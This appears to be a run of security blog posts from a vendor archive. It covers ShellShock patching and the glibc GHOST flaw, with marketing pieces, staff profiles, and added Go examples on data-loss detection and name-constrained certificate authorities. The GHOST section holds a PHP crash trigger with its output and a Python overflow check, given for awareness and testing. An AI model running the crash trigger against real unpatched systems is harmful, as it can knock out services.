Install the latest version of Bash or apply the latest Bash patches. The first ShellShock patches were found to be incomplete (the follow-up issues include CVE-2014-7169), so be sure to apply every patch that has been released, not only the first one.

Symantec Cloud-based WAF (シマンテック クラウド型WAF) can also protect websites against ShellShock attacks.

■参考文献

JVNVU#97219505

OS command injection vulnerability in GNU Bash

http://jvn.jp/vu/JVNVU97219505/index.html

GHOST vulnerability (CVE-2015-0235) explained

This blog series introduces vulnerabilities in websites and in the web applications running on them, with the aim of raising awareness.

This entry covers GHOST (CVE-2015-0235), a vulnerability in glibc, the C library used on Linux and other systems.

Note: the content was reviewed by Hiroshi Tokumaru of HASH Consulting Corporation.

+++++++++++++++++++++++++++++++++++++++++++++++

GHOST vulnerability (CVE-2015-0235)

■Overview

glibc (the GNU C Library), used internally by Linux systems, provides a function called gethostbyname for resolving a host name to an IP address. In January 2015 it was discovered that this function (more precisely the internal helper __nss_hostname_digits_dots, shared by gethostbyname, gethostbyname2 and their _r variants) miscalculates the number of bytes it needs, making a buffer overflow possible. The vulnerability is known as GHOST.

Among software that uses gethostbyname, the Exim mail transfer agent was shown to allow actual arbitrary code execution, and other affected software has been reported.

■Attack scenario and impact

Run the following PHP script from the console.

<?php
// Resolve names made of 1027 and 1028 '0' characters; on a vulnerable glibc the
// second call corrupts heap memory and the process aborts.
gethostbyname(str_repeat('0', 1027));
gethostbyname(str_repeat('0', 1028));

str_repeat repeats a string the given number of times, so the arguments to gethostbyname are 1027 zeros and 1028 zeros respectively. Running the script gives the following output.

$ php gethostbyname-vul.php
*** glibc detected *** php: realloc(): invalid next size: 0x08b0b118 ***
======= Backtrace: =========
/lib/libc.so.6[0x92de31]
/lib/libc.so.6[0x9330d1]
/lib/libc.so.6(realloc+0xdc)[0x93326c]
[remainder omitted]

An invalid memory operation has been detected and PHP has aborted.

The above shows the vulnerability in PHP; where the Exim mail server is in use, it has been confirmed that arbitrary code can be executed through an attack over the Internet.

■Impact of the vulnerability

Where Exim is in use, arbitrary code can be executed from outside, with consequences such as:

  • Reading, modifying or deleting files on the server
  • Unauthorised system operations (adding or changing user accounts, and so on)
  • Downloading and running malicious programs
  • Attacks on other servers (use as a stepping stone)

Arbitrary code execution has not been demonstrated for software other than Exim, but as the PHP example shows, software may crash (terminate abnormally), and in the worst case arbitrary code may be executed.

■How to check for the vulnerability

Qualys, which discovered the vulnerability, has published a test program (C source):

https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt

$ gcc GHOST.c         # compile
$ ./a.out             # run
Vulnerable            # "Vulnerable" means the system is affected
$

The program exercises the glibc installed on the system; note that processes already running keep the old library mapped until they are restarted.
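For hosts without a C compiler, the same test can be driven from Python. The following is an added example that re-implements the idea of Qualys's GHOST.c with ctypes; it is not Qualys's code or the original post's. It calls gethostbyname_r() with an all-digit name whose length matches the flawed size computation and a deliberately small buffer that is followed by a canary: a vulnerable glibc writes past the buffer and changes the canary, a fixed one returns ERANGE. The length arithmetic follows GHOST.c, the struct hostent layout is glibc's on Linux (assumption for other C libraries), and the function reports "inconclusive" wherever gethostbyname_r is unavailable, for instance on macOS or Windows. The overflow, where it occurs, is a few bytes into our own canary, so the check is safe to run.

```python
"""GHOST (CVE-2015-0235) check via ctypes, after the idea of Qualys's GHOST.c.
Added example; struct layout assumes glibc on Linux."""
import ctypes
import ctypes.util
import errno

BUFFER_SIZE = 1024
CANARY = b"in_the_coal_mine"

class HostEnt(ctypes.Structure):
    """struct hostent as laid out by glibc (assumption for other libcs)."""
    _fields_ = [("h_name", ctypes.c_char_p),
                ("h_aliases", ctypes.POINTER(ctypes.c_char_p)),
                ("h_addrtype", ctypes.c_int),
                ("h_length", ctypes.c_int),
                ("h_addr_list", ctypes.POINTER(ctypes.c_char_p))]

def vulnerable_name_length() -> int:
    """Name length at which __nss_hostname_digits_dots undercounts its buffer need by
    sizeof(char *): the buffer minus 16 address pointers and two char pointers, minus
    the terminating NUL (the arithmetic GHOST.c uses)."""
    ptr = ctypes.sizeof(ctypes.c_void_p)
    return BUFFER_SIZE - 16 * ptr - 2 * ptr - 1

def _gethostbyname_r():
    """Locate gethostbyname_r in the C library Python is linked against, or None."""
    for loader in (lambda: ctypes.CDLL(None),
                   lambda: ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6")):
        try:
            return loader().gethostbyname_r
        except (OSError, TypeError, AttributeError):
            continue
    return None

def ghost_check() -> str:
    """Return 'vulnerable', 'not vulnerable (ERANGE)' or 'inconclusive'."""
    fn = _gethostbyname_r()
    if fn is None:
        return "inconclusive"
    fn.restype = ctypes.c_int
    fn.argtypes = [ctypes.c_char_p, ctypes.POINTER(HostEnt), ctypes.c_void_p, ctypes.c_size_t,
                   ctypes.POINTER(ctypes.POINTER(HostEnt)), ctypes.POINTER(ctypes.c_int)]
    # Layout: buffer || canary || NUL.  Only BUFFER_SIZE bytes are declared to the library.
    buf = ctypes.create_string_buffer(BUFFER_SIZE + len(CANARY) + 1)
    buf.raw = bytes(BUFFER_SIZE) + CANARY + b"\0"
    resbuf, result, herrno = HostEnt(), ctypes.POINTER(HostEnt)(), ctypes.c_int(0)
    name = b"0" * vulnerable_name_length()
    retval = fn(name, ctypes.byref(resbuf), ctypes.addressof(buf), BUFFER_SIZE,
                ctypes.byref(result), ctypes.byref(herrno))
    if buf.raw[BUFFER_SIZE:BUFFER_SIZE + len(CANARY)] != CANARY:
        return "vulnerable"          # the library wrote past the buffer it was given
    if retval == errno.ERANGE:
        return "not vulnerable (ERANGE)"   # fixed glibc notices the buffer is too small
    return "inconclusive"

if __name__ == "__main__":
    print(ghost_check())
```

As with GHOST.c, this tests the library the interpreter has loaded, so run it after patching and after restarting the services that matter, or check those processes' mapped libraries separately.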

■Countermeasures

The bug was fixed upstream in glibc 2.18 (May 2013), and each Linux distribution has issued backported patches for the older releases it ships; apply the applicable update. Because glibc is loaded into every running process, restart the affected services (or reboot) after updating so that the fixed library is actually in use.

■参考文献

Qualys advisory (English)

https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt

Security alert from the Information-technology Promotion Agency, Japan (IPA)

https://www.ipa.go.jp/security/announce/20150129-glibc.html


Hijacked Twitter accounts tweet links to adult dating and hookup sites

More than 2,500 Twitter accounts have been hijacked and are tweeting links to adult dating and hookup sites.


Android threats evolve to handle Marshmallow’s new permission model

Android.Bankosy and Android.Cepsohord are capable of working with the new runtime permission model introduced in Android 6.0 Marshmallow.


SWIFT attackers’ malware linked to more financial attacks

Bank in Philippines was also targeted by attackers, whose malware shares code with tools used by Lazarus group.


Symantec Receives Awards for Leadership in Diversity

Scott Taylor Named to UPstanding Top 100 Executive Power List

Today, we profile two recent awards Symantec has received as a leading advocate in promoting diversity across our business, community and industry. 

Leadership California Corporate Leader Award

Symantec has been awarded the Corporate Leader Award by Leadership California, highlighting our "exemplary leadership in the inclusion of women in executive and board of director positions."

Leadership California is a network of accomplished women, dedicated to advancing the leadership role women play in impacting business, social issues and public policy. Through Leadership California's Issues and Trends Program, Symantec has strengthened the business acumen of senior female executives by training them on the key drivers of business in their region. Symantec's Vice President, Corporate Responsibility & Chief Diversity Officer Cecily Joseph completed the CIT program in 2008 and now serves as the Vice President of Leadership California's board. Additionally, the partnership has provided valuable networking for Symantec employees.

On May 2nd Sheila Jordan, Symantec's Chief Information Officer, accepted the award at Leadership California's annual awards event, attended by nearly 300 female leaders across government, academia and the non-profit sector. The event celebrated achievements of female leaders that have impacted their communities and governments, and have demonstrated groundbreaking achievements.


Symantec's Sheila Jordan accepts the company's Corporate Leader Award from Leadership California for leadership in promoting diversity.

In an interview with Leadership California, Sheila shared how Symantec embeds diversity into core business and philanthropic efforts:

Diversity came up when I interviewed for my job at Symantec, so it’s clearly part of Symantec’s culture. It’s one of the company’s core values, and we focus on diversity in all aspects of the company—it helps us to think differently and to aggressively innovate. Our diverse talent pool helps us innovate at all levels—product development, IT, finance, and marketing.

We’ve systematically worked to get women into leadership roles and have succeeded—that’s exciting. Our board is 30% women which we love. We have our internal Symantec Women’s Action Network (SWAN) that’s been part of the company for years. We have demonstrated how important gender equality is for our company culture and our practices.

Externally, we participate in Leadership California, and also in Anita Borg, a nonprofit organization that encourages recruitment, retention, and advancement of women in technology. We sent over 200 women to the Anita Borg conference last year. We source interns, we sponsor development programs, and we learn from the speakers. Our women are exposed to best practices, make connections, network, and gain tools on career development. We want to make sure we’re developing our women, and that we’ll have a talent pipeline and role models. We also want to stay connected with Leadership California and with STEM activities for young girls.

As one of the company's top executives, Sheila has been central to transforming business performance and is a key advocate for the growth and advancement of our female talent. We couldn’t have been happier to have Sheila accept this recognition on behalf of Symantec.  

Scott Taylor Named to UPstanding Executive Power List  

Scott Taylor, Symantec Executive Vice President and General Counsel, was recently recognized on the UPstanding Executive Power List as a champion for diversity at Symantec and an active advocate for racial equality within his community and industry.

The UPstanding Executive Power List includes the Top 100 Executive Black, Asian, and Minority Ethnic (BAME) professionals working in the US, UK and Ireland. Candidates are analyzed across four categories including: professional and business achievements; contributions to the BAME agenda in their community, industry and company; and seniority/influence within their organization.   


Scott is an executive sponsor of Symantec's Black Employee Resource group (SyBER), which focuses on career advancement and mentorship opportunities, recruiting tactics, and community building to attract and retain Black talent. Most recently, he led SyBER's celebration of Black History Month, partnering with HBCU Connect, the largest organization of Black college alumni, students, and supporters, to host more than 125 professionals from across Silicon Valley and leading non-profits to discuss ways to increase the talent pool of qualified Black technology workers.

Additionally, he sits on the national advisory board of Stanford’s Center for Comparative Studies on Race and Ethnicity and has encouraged male advocates for female diversity to join him in supporting recent events by Symantec's Women's Action Network (SWAN).

Scott is a member of Symantec's executive team and leads the company's corporate responsibility and diversity and inclusion teams, and we are extremely proud that he has been recognized for his exemplary leadership and actions in promoting an inclusive environment for BAME professionals.

Stay tuned! In the coming weeks, we will discuss the advancement of our ERGs and the central role Scott, Sheila and our ERG global executive sponsors play in leveraging the passions of our employees to contribute to our leadership in diversity.   

Symantec to Share its Security Expertise at Gartner Summit 2016

Align your security and risk strategies with Symantec at the Gartner Security and Risk Management Summit 2016. Visit Booth #303 for demos and more.

The countdown has well and truly begun to the Gartner Security and Risk Management Summit 2016 in Washington DC (June 13-16 at the National Harbor, MD) – a not-to-be-missed opportunity for senior executives to re-evaluate the levels of exposure to cyber threats that constantly lay siege to their operations.

It is all about enabling organisations to reduce risk and adopt new security models that will build the trust and resilience needed to drive their business forward. Symantec will play a key role in ensuring delegates come away from the summit armed with the expertise they need to take their businesses to the next level of security, whether that be cyber defence, the IoT, securing the digital world, staying ahead of advanced threats or dealing with cloud, SaaS and Office 365.

You need the comprehensive protection from threats that Symantec brings as the leading provider of security solutions. With many enterprises today having layered technology upon technology, the overflow of information into their organisations has become unmanageable. Symantec’s security intelligence, however, filters these messages, reducing white noise and allowing your team to focus on what’s important - moving them from being reactive and used when things go wrong to engaged and proactive; strategic and helping to move business forward.

Ultimately – and inevitably – there will be breaches: where information that looks ‘good’ (i.e., safe) enters the organisation from multiple angles simultaneously. That’s when you need the right technology on the inside to recognise when such attacks are taking place, automatically alerting, blocking and even remediating - keeping business safe from threat.

All of the sessions that Symantec will be delivering at the Gartner Summit (see below) will highlight this "how to stay safe" message:

How to transform your Security Operations to Cyber Defence
Would you know if you were being targeted or breached? To reduce the volume of alerts and data security generates you need to adopt a more holistic approach - connecting technology, understanding risk posture and moving from reactive to proactive.

A New Paradigm for Securing the Digital World
Digital technologies including IoT and cloud create opportunity and risk. Companies should look to cloud as foundational for security solutions; providing improved threat intelligence, rapid detection and quick remediation.

IoT: Taking back control from chaos
How can the CISO and CIO ensure that security is built into corporate IoT? How do they manage the risk from employee-owned IoT? This session will sketch strategies for ensuring that security for IoT is considered at all levels.

Staying ahead of advanced threats: Best Practice from the Trenches
Together with our customer we’ll explain exactly how Symantec Advanced Threat Protection is keeping its business safe today and its innovative plans for being safer in the future.

Moving to Office 365 increases productivity, but what about security?
You need confidence in security applied to all cloud services. Don’t ask: “How should I protect Office 365?”. Rephrase the question to: “How do I protect information from threats and loss, wherever it resides?”

Ultimately, Symantec’s presence at the Gartner Summit is all about enabling senior delegates to gain the insights they require to align their security & risk strategies with enterprise objectives and to apply the latest techniques to tackle risk, wherever that may surface.

Visit us at Booth #303 to learn about the new Symantec, experience a demo of our latest solutions and talk to our specialists. We look forward to seeing you in June!

Extending the Security of Office 365: Symantec Data Loss Prevention

How Symantec can bring higher levels of protection, control and visibility

While your organization has turned to Office 365 for productivity with the cloud, is your data safe and secure? According to an IDC white paper sponsored by Symantec, organizations should focus their efforts on the main areas of authentication and access control, data loss prevention, email security, and advanced threat protection to improve upon Office 365's integrated security features.

In previous posts of this series, we examined how Symantec Office 365 Protection helps fill in the security gaps that Office 365 misses; and in particular, email and advanced threat protection. In this installment, we’ll have a close look at how Symantec Data Loss Prevention (DLP) can provide an extra layer of security for organizations using Office 365.

The need for Data Loss Prevention

While Microsoft Office 365 has some basic built-in security, enterprises should consider augmenting and extending the security.

Does your organization have a solid data loss prevention solution?

Organizations using the cloud need data loss prevention technology to locate, monitor, and protect their data―so that they know who is doing what, with what data, in real time. Data loss prevention can block certain types of sensitive data from leaving an organization.

While Office 365 has built-in data loss prevention and encryption capabilities, it doesn’t meet the advanced compliance and complex intellectual property use cases and requirements of enterprises.

Challenges faced with Office 365’s basic built-in data loss prevention:

  • Limited content detection methods (simple regular expressions, some document fingerprinting, and basic watermarking) can produce a high number of false positives
  • Those false positives increase the burden on IT
  • Incident remediation and workflow options are limited to basic notification and blocking

Overall, these obstacles make it difficult for enterprises to respond effectively to data loss incidents.

How Symantec Data Loss Prevention Extends Office 365

Symantec for Office 365 is designed as a comprehensive security solution that seamlessly integrates with Office 365 for greater protection of your valuable information while detecting and remediating increasingly sophisticated threats.

Symantec delivers enterprise-strength data protection.

Symantec DLP Cloud Service for Email is a new cloud-based service built on Symantec’s market-leading data loss prevention technology. It offers the broadest content detection capabilities, including described content matching (keywords, expressions), data fingerprinting (structured data and unstructured documents), and machine learning (for content such as source code and forms). These advanced detection technologies are coupled with support for over 360 different file types. It offers sophisticated policy management, reporting, and incident remediation workflows.

Use a single unified set of DLP controls for all cloud and on-premises environments.

Unlike Microsoft’s multiple management interfaces and disjointed controls, Symantec’s solution provides robust and unified security controls for heterogeneous environments and hybrid deployment models. This allows you to extend your security infrastructure and policies to Exchange Online and a range of non-Microsoft applications & mobile devices environments. The Symantec Enforce management platform provides a unified, easy-to-use management console across all DLP channels, including Office 365 Exchange, and other cloud apps and on-premises deployments.

Take advantage of seamless policy-based encryption.

Symantec uses a policy-based approach to encrypt emails based on message attributes or message content in a manner that is totally transparent to the sender. Unlike Office 365, Symantec’s encryption solution does not require encrypted message recipients to register or use a Microsoft account, or use one-time passcodes to access encrypted messages. Symantec Policy Based Encryption also works with all types of mobile devices and does not require apps like the Office Message Encryption Viewer to access encrypted messages.
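To make the difference between regex-only detection and validated detection concrete, and to show what a policy-driven block/encrypt decision looks like, here is an added Go example. It is not Symantec's or Microsoft's code and does not model either product's internals; the domain names, document text and card numbers are constructed sample data (4111 1111 1111 1111 is a commonly used test PAN). It pairs a naive "13 to 16 digits" regex with a detector that validates each candidate using the Luhn checksum, adds a whitespace-normalised SHA-256 document fingerprint, and applies a policy that allows, encrypts or blocks an outbound message based on recipient and content.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// Action is the remediation a policy applies to an outbound message.
type Action string

const (
	ActionAllow   Action = "allow"
	ActionEncrypt Action = "encrypt" // policy-based encryption, transparent to the sender
	ActionBlock   Action = "block"
)

// naiveCardRe is the "simple regex" approach: any run of 13-16 digits is a card number.
var naiveCardRe = regexp.MustCompile(`\b\d{13,16}\b`)

// cardCandidateRe tolerates the spaces and dashes people actually type; every
// candidate is then validated with the Luhn checksum before it counts as a hit.
var cardCandidateRe = regexp.MustCompile(`\b(?:\d[ -]?){12,15}\d\b`)

// luhnValid reports whether a digit string passes the Luhn checksum.
func luhnValid(digits string) bool {
	sum, double := 0, false
	for i := len(digits) - 1; i >= 0; i-- {
		d := int(digits[i] - '0')
		if d < 0 || d > 9 {
			return false
		}
		if double {
			d *= 2
			if d > 9 {
				d -= 9
			}
		}
		sum += d
		double = !double
	}
	return sum%10 == 0
}

// NaiveCardHits counts regex-only matches; this is where false positives come from.
func NaiveCardHits(text string) int {
	return len(naiveCardRe.FindAllString(text, -1))
}

// ValidatedCardHits returns the normalised card numbers that also pass Luhn.
func ValidatedCardHits(text string) []string {
	var hits []string
	strip := strings.NewReplacer(" ", "", "-", "")
	for _, m := range cardCandidateRe.FindAllString(text, -1) {
		if digits := strip.Replace(m); luhnValid(digits) {
			hits = append(hits, digits)
		}
	}
	return hits
}

// Fingerprint is a whole-document fingerprint: SHA-256 over case- and
// whitespace-normalised text, so a reformatted copy of the document still matches.
func Fingerprint(doc string) string {
	norm := strings.Join(strings.Fields(strings.ToLower(doc)), " ")
	sum := sha256.Sum256([]byte(norm))
	return hex.EncodeToString(sum[:])
}

// Message is the subset of an outbound email the policy inspects.
type Message struct {
	To          string
	Body        string
	Attachments []string // attachment contents, already extracted to text
}

// Policy holds the organisation's own mail domain and the fingerprints of
// documents that must never leave it. Both values are assumptions for this example.
type Policy struct {
	InternalDomain string
	ProtectedDocs  map[string]bool
}

// Evaluate returns the action for m: internal mail is left alone, an external
// message carrying a protected document is blocked, one carrying a Luhn-valid
// card number is encrypted, and a bare regex hit that fails Luhn is allowed
// (the false positive a regex-only engine would have escalated to IT).
func (p Policy) Evaluate(m Message) Action {
	if strings.HasSuffix(strings.ToLower(m.To), "@"+strings.ToLower(p.InternalDomain)) {
		return ActionAllow
	}
	for _, a := range m.Attachments {
		if p.ProtectedDocs[Fingerprint(a)] {
			return ActionBlock
		}
	}
	if len(ValidatedCardHits(m.Body)) > 0 {
		return ActionEncrypt
	}
	return ActionAllow
}

func main() {
	// Constructed sample data, not from any real incident.
	policy := Policy{
		InternalDomain: "corp.example",
		ProtectedDocs:  map[string]bool{Fingerprint("Project Phoenix Q3 plan - CONFIDENTIAL"): true},
	}
	msgs := []Message{
		{To: "partner@other.example", Body: "ref 1234567890123456 as discussed"},                     // fails Luhn: allow
		{To: "partner@other.example", Body: "card 4111-1111-1111-1111, exp 12/29"},                   // test PAN: encrypt
		{To: "partner@other.example", Attachments: []string{"project   phoenix q3 PLAN - confidential"}}, // fingerprint: block
		{To: "alice@corp.example", Attachments: []string{"Project Phoenix Q3 plan - CONFIDENTIAL"}},      // internal: allow
	}
	for _, m := range msgs {
		fmt.Printf("to=%s naive=%d validated=%d action=%s\n",
			m.To, NaiveCardHits(m.Body), len(ValidatedCardHits(m.Body)), policy.Evaluate(m))
	}
}
```

Note the two directions the naive regex gets wrong: the 16-digit reference number in the first message is a hit for it but fails Luhn, while the hyphenated card number in the second message is invisible to it but is caught and encrypted by the validated detector.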

A 2016 Gartner Magic Quadrant Leader for Data Loss Prevention

Independent research organization Gartner recently named Symantec a leader in the 2016 Gartner Magic Quadrant for Data Loss Prevention. The Gartner recognition of Symantec as a DLP Leader assures that you are partnering with a leader in DLP technology.

Symantec helps you transition to the cloud with confidence

Microsoft Office 365 is an excellent platform to enhance productivity and while it does include some security measures, you should enhance and extend security measures with Symantec. To fight advanced threats, you need advanced protection. Symantec Office 365 Protection helps fill in the security gaps that Office 365 misses. We help enhance the security of Office 365 and most of all, create defenses to help protect your organization and your sensitive data.

Looking for more insights?

Visit Symantec Office 365 Protection

Symantec Protocol Keeps Private Keys In Its Control


The CA community is complex and nuanced, particularly given the issuance of certificates in a multitude of environments and devices. We’ve been reminded of that fact again this week by confusion over an intermediate CA used by Blue Coat. Companies often have their own intermediate CA so they can issue certificates only for their organization, which was the case for Blue Coat. These types of certificates are often used for testing purposes and usually are discarded once the tests are completed. When we issue an intermediate CA, our protocols state that Symantec maintains full control of the private key. That’s exactly what took place with Blue Coat. The company never had access to the private key, and speculation that Blue Coat was issuing public certificates for other organizations is incorrect. Like any topic that is complex, it’s easy for things to get misconstrued. This was a routine CA request and nothing more.
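The property that an intermediate can "issue certificates only for their organization" can be enforced technically, not just procedurally, with the X.509 Name Constraints extension (RFC 5280) on the intermediate certificate. The Go program below is an added example, not code from Symantec or Blue Coat, and the CA names, the domain corp.example and the serial numbers are made up. It builds a root, has the root sign an intermediate that is constrained to one DNS domain (the intermediate's private key is generated and used only inside the function playing the issuing CA), issues two leaf certificates from that intermediate, and shows that standard path validation accepts the in-scope name and rejects the out-of-scope one.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Hypothetical organisation the intermediate is scoped to; not a real CA or customer.
const permittedDomain = "corp.example"

// issue generates a P-256 key for template and has parentKey sign the certificate.
// When parent == template and parentKey is nil the result is self-signed (the root).
func issue(template, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	signer := parentKey
	if signer == nil {
		signer = key
	}
	der, err := x509.CreateCertificate(rand.Reader, template, parent, &key.PublicKey, signer)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

func baseTemplate(cn string, serial int64) *x509.Certificate {
	return &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
	}
}

// BuildPKI returns a root and a name-constrained intermediate plus the intermediate's
// private key. The key stays with the caller acting as issuing CA; the organisation
// named in the constraint only ever receives certificates signed by it.
func BuildPKI() (root, inter *x509.Certificate, interKey *ecdsa.PrivateKey, err error) {
	rootTpl := baseTemplate("Example Root CA", 1)
	rootTpl.IsCA, rootTpl.BasicConstraintsValid = true, true
	rootTpl.KeyUsage = x509.KeyUsageCertSign | x509.KeyUsageCRLSign
	root, rootKey, err := issue(rootTpl, rootTpl, nil)
	if err != nil {
		return nil, nil, nil, err
	}
	interTpl := baseTemplate("Example Corp Intermediate CA", 2)
	interTpl.IsCA, interTpl.BasicConstraintsValid = true, true
	interTpl.KeyUsage = x509.KeyUsageCertSign | x509.KeyUsageCRLSign
	interTpl.MaxPathLen, interTpl.MaxPathLenZero = 0, true   // may sign end-entity certs only
	interTpl.PermittedDNSDomains = []string{permittedDomain} // RFC 5280 Name Constraints
	interTpl.PermittedDNSDomainsCritical = true
	inter, interKey, err = issue(interTpl, root, rootKey)
	return root, inter, interKey, err
}

// IssueLeaf has the intermediate sign a TLS server certificate for dnsName.
// Signing does not check the constraint; relying parties enforce it at validation.
func IssueLeaf(inter *x509.Certificate, interKey *ecdsa.PrivateKey, dnsName string, serial int64) (*x509.Certificate, error) {
	tpl := baseTemplate(dnsName, serial)
	tpl.DNSNames = []string{dnsName}
	tpl.KeyUsage = x509.KeyUsageDigitalSignature
	tpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}
	leaf, _, err := issue(tpl, inter, interKey)
	return leaf, err
}

// VerifyChain is the path validation a client performs, name constraints included.
func VerifyChain(leaf, inter, root *x509.Certificate, dnsName string) error {
	roots, inters := x509.NewCertPool(), x509.NewCertPool()
	roots.AddCert(root)
	inters.AddCert(inter)
	_, err := leaf.Verify(x509.VerifyOptions{DNSName: dnsName, Roots: roots, Intermediates: inters})
	return err
}

// Demo issues one in-scope and one out-of-scope leaf and returns both verification results.
func Demo() (inScopeErr, outOfScopeErr error) {
	root, inter, interKey, err := BuildPKI()
	if err != nil {
		return err, err
	}
	good, err := IssueLeaf(inter, interKey, "mail."+permittedDomain, 100)
	if err != nil {
		return err, err
	}
	bad, err := IssueLeaf(inter, interKey, "www.other.example", 101)
	if err != nil {
		return err, err
	}
	return VerifyChain(good, inter, root, "mail."+permittedDomain),
		VerifyChain(bad, inter, root, "www.other.example")
}

func main() {
	inScope, outOfScope := Demo()
	fmt.Println("mail.corp.example ->", inScope)    // nil: chain verifies
	fmt.Println("www.other.example ->", outOfScope) // non-nil: CA not authorized for this name
}
```

Two points worth noticing. The signing operation happily produces the out-of-scope leaf; it is the verifier that rejects it, so the constraint protects relying parties only where their validation code honours it, which is one reason the issuing CA keeping the intermediate key in its own control still matters. And the path length of zero means the intermediate cannot mint further CAs, so the scope cannot be widened from below.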

Android malware evolves to manipulate Marshmallow's new permission model

Android.Bankosy and Android.Cepsohord can work with the new runtime permission model introduced in Android 6.0 Marshmallow.

Malware used by SWIFT attackers linked to more financial attacks

The attackers also targeted a bank in the Philippines; the malware's code is shared with tools used by the Lazarus group.

19 Years and Counting - What I've Learned on my Journey from Intern to VP at Symantec


May is Asian-Pacific American Heritage Month in the United States, and as we come to the end of the month, we would like to take the opportunity to celebrate our Asian-American employees and those in the APJ and India regions, for their contributions to Symantec and supporting us in becoming a global market leader in security and information management solutions. Today we share the story of a long-time employee, Spencer Liang, who has been with Symantec for nearly 20 years beginning as an intern and moving his way up to his current role as Vice President.

When I tell people I've been with Symantec for 19 years, they are often shocked that I have been with the same company for that long. To me it has been simple. I have been given opportunities, constantly challenged to expand my skills, supported by my managers and team, and most importantly, I have enjoyed my work the entire way.

I am an only child and was raised in Taiwan until the age of 10 when my family moved to Los Angeles, California where I live today.

I have always had an interest in technology, playing video games with friends, many of whom shared my interest in the industry. During my youth, I wasn't aware my mother was a programmer and sometimes I wonder if it was her genes that got me to where I am today. However, I do remember that two of my uncles worked in IT – one for the financial sector and the other for local government. It was during my high school studies that one of them convinced me to pursue a career in technology due to the vast opportunities the industry provided and the increasing demand for workers (at the time I was studying architecture).

Based on this, I changed my undergraduate focus to computer science at UCLA, which would set the foundation for my future career. One of my favorite classes at UCLA was led by a Symantec Fellow, Carey Nachenberg, who left a lasting impression on me. When it came time to begin an internship, I had a few choices, but I knew I wanted to work for Symantec. I began an internship the summer of my junior year and the rest is history….


Spencer Liang has been with Symantec for nearly 20 years, starting as an intern and moving his way up to his current role as Vice President, Engineering.

So why 19 years?

My 19 years with the company have definitely not been without excitement, or without change. My job and the company have both evolved. I have had the chance to work in a variety of positions from Quality Assurance Engineer to Sr. Software Engineer to Director of Engineering, and Symantec has transformed into one of the world's leading cybersecurity companies.

Additionally, I find the field of cybersecurity one of the most exciting and impactful.  Cybersecurity threats are increasing every day and becoming more sophisticated. They are targeting individuals, corporations, governments. The safety of our world depends on the safety of the internet. Every day brings a new challenge and every day I know that I am making Symantec a stronger company, solving complex problems for our customers, and making our world a safer place. Every day I am helping someone and this is extremely rewarding.

To me, the people are what make Symantec a special place. My team has been collaborative and supportive, my managers challenging and inspiring, and all of this together has pushed me to grow, to develop new skills, to become a better leader for my team, and to be an expert in my field.

Since I began my career, technology has changed so much and created exponential opportunities. My advice to anyone is regardless of your background, pursue what you are passionate about. Try different functions, different responsibilities, different teams. You don't really know what a job entails until you start, so don't be afraid to take a chance and try it out. Along the way remember that no job is too small; sometimes it is the smallest tasks that make the biggest difference.

I am lucky to live in one of the centers of the US melting pot, a highly diverse city where the industry judges you on what you accomplish, not your background. I know this is not the same across the world, but I do feel it is the same across Symantec. 

I truly believe at Symantec we embrace a diversity of backgrounds, beliefs, ideas and inputs. I hope my experience and my interactions with those internal and external to Symantec have and will inspire others to take a chance, pursue their dreams and take on new challenges.

Just remember to go in with an open mind and enjoy the experience. Sometimes you have to work somewhere to see if it is a good fit, and I have been lucky in the last 19 years to find mine. 

Spencer Liang is Symantec's Vice President, Engineering

Mind the Gap: Addressing the Cyber Security Skills Shortage

Six best practices to strengthen your security posture

In this evolving cyber landscape, adversaries are well funded and moving faster, attacks are getting more sophisticated and time to detection is taking too long.  Yet, budgets are constrained, and in-house resources are lacking.  Also, 86 percent of companies report that there is a shortage of professionals available to fill the growing cybersecurity need.[1] With these issues front and center, CISOs are asking questions and looking for answers. 

At Symantec, we have been helping executives fill the voids in their security operation for more than a decade.  Through our work around the globe, we are seeing trends that are shaping the marketplace and that are bound to have an impact on your security plans for the future.  Here are six things you will want to consider as you determine how to best strengthen your security posture.

  • As the threat environment grows, regulatory compliance becomes more complicated. The growth of technology and the explosion of the threat landscape is making compliance to existing regulations more and more challenging – whether PCI DSS, ISO 27001, SOX or any number of other specifications that call for consistent oversight and reporting.  Finding the time, resources, and budget to stay on top of these ever-changing demands can be costly and distracting.  It is critical that you have professional help. A Managed Security Service Provider (MSSP) can help you simplify the process and manage compliance details as well as keep up-to-date with credentialing, such as certification with ISO 27001, compliance as a PCI service provider, SSAE16/SOC1 Type II reporting and demonstrating attestation from both internal and external auditors, multiple times each year.  

  • Millions are being spent on IT migration to the cloud.  It follows that your security plan should keep in step. Don’t compromise the robust security infrastructure you have attained in recent years. Whether your data and applications reside in your data center or someone else’s, ensure the same level of protection for both.  An MSSP should be able to provide you with the same level of security monitoring for both your cloud and on-premises application infrastructure. 

  • Advanced detection techniques could head off new risks. Some threats leave traces that by themselves could be false positives, yet they may actually represent an incident.  Many security products have limited visibility, seeing only part of the threat, missing the whole pattern and thus allowing the threat to go undetected.  That is why it is critical that your MSSP have advanced analytic capabilities, such as machine learning, to identify potential incidents that are missed by control points.  Correspondingly, your MSSP’s SOC personnel should be dedicated to your industry and business so that they are able to view alerts in context, paint a picture of potential impacts on your organization and possibly initiate a new incident investigation.

  • Your existing security infrastructure holds value.  You’ve spent most of your budget the past few years building a security infrastructure to support your business.  But, threats have grown, and talent is scarce.  You need help!  Your MSSP should take time to understand your operational framework and work with you to fill your critical gaps.  Your MSSP should be able to help you build a security monitoring plan that integrates into your existing workflows, complements your assets and actually strengthens your security profile.

